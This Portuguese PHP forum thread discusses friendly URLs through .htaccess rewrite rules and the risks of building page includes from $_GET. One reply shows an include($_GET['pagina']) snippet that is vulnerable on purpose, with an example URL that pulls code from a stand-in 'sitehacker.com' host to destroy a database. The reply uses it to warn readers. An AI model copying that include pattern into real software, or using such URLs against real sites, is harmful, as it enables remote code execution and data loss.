Sistema De Páginas Php

[Cristian Augusto]

Olá pessoal!

Vejo em muito sites, independente do gênero, a utilização da função $_GET para a formulação dos links. Exemplo: "index.php?pagina=contato".

Estou com um projeto em mente, e gostaria de quebrar este "padrão".

Gostaria de saber como faço para criar links como por exemplo "www.site.com.br/servidores/vps"

Já vi esta função no WordPress, onde é utilizado "www.site.com.br/01/02/2012/postagem"

Alguem tem idéia de como posso fazer isso?

Abraço!

[João Vitor Mateus]

Verifique as opções de permanlinks que o seu sistema usa.

[brasilws]

Pesquise sobre url amigáveis utilizando .htaccess

[mrladeia]

Isso se chama URL Amigável.

http://www.google.com.br/search?q=url+amigavel+php

Alguns frameworks ajudam muito nessa parte.

Bom estudo :)

[Cleiton Garcia]

Amigo, a maioria dos sites utiliza _GET e é a melhor maneira a se fazer.

Na página, ex.: "pagina.php?uid=$" faça uma comparação com o 'UID' digitado no banco de dados, se existir você imprime o conteúdo, caso contrário inclui ou redireciona para uma página 404, e verifique se ele digitar, se estiver em branco já sabe o que deve fazer!

Mas para contornar este padrão utilize '.htaccess', você pode muito bem 'criar um novo nome' pra essa página. Vai um exemplo de .htaccess.

RewriteEngine On

RewriteRule ^pagina\/([^/]*)\.htm$ /pagina.php?nomeunico=$1 [L]

No exemplo acima, ativo a função 'rewrite' e logo crio a regra pra uma página, no caso a página é 'pagina.php' eu identifico via $_GET porém através do nome dela, tem como formatar o ID dela e recuperar pelo nome, mas é algo mais complicado e desnecessário.

Sempre a pessoa digitar 'site.com.br/pagina/nome.html' ele vai enteder que a pessoa está tentando acessar 'site.com.br/pagina.php?nomeunico=nome' (:

Espero ter ajudado.

[Cristian Augusto]

Certo!

Muito obrigado mesmo pela ajuda de todos, será muito útil!

Abraço a todos!

[joaopaulo]

Amigo, a maioria dos sites utiliza _GET e é a melhor maneira a se fazer.

Essa é a pior maneira de se fazer. Você está abrindo uma brecha sem precedentes em seu website.

Imagine que seu código seja algo assim:

<?php


$pagina = $_GET['pagina'];

include($pagina.'php');

blablalblallablba

?>

E se um hacker olocar ali uma URL, acessando assim: www.xx.com.br/index.php?pagina=http://sitehacker.com/destruir-bd Dentro da URL do hacker bastaria ter uma funçao tal qual:

<?php


mysql_query ("FERRAR BD ")


?>

[Cleiton Garcia]

Essa é a pior maneira de se fazer. Você está abrindo uma brecha sem precedentes em seu website.

Imagine que seu código seja algo assim:

<?php


$pagina = $_GET['pagina'];

include($pagina.'php');

blablalblallablba

?>

E se um hacker olocar ali uma URL, acessando assim: www.xx.com.br/index.php?pagina=http://sitehacker.com/destruir-bd Dentro da URL do hacker bastaria ter uma funçao tal qual:

<?php


mysql_query ("FERRAR BD ")


?>

Não não João,

A maneira que eu expliquei é recuperada através de banco de dados, se o que foi digitado não existir no banco, não há nada que se possa fazer além de técnicas um tanto quanto simples de conter SQL Injection. (:

Creio que todo código é o melhor à se fazer, mas tem que saber deixar ele seguro e otimizar o mesmo.

[joaopaulo]

Não não João,

A maneira que eu expliquei é recuperada através de banco de dados, se o que foi digitado não existir no banco, não há nada que se possa fazer além de técnicas um tanto quanto simples de conter SQL Injection. (:

Creio que todo código é o melhor à se fazer, mas tem que saber deixar ele seguro e otimizar o mesmo.

Exatamente, tem que saber previnir. Essa vulnerabilidade saiu na Oswap 2007 e na Oswap 2011.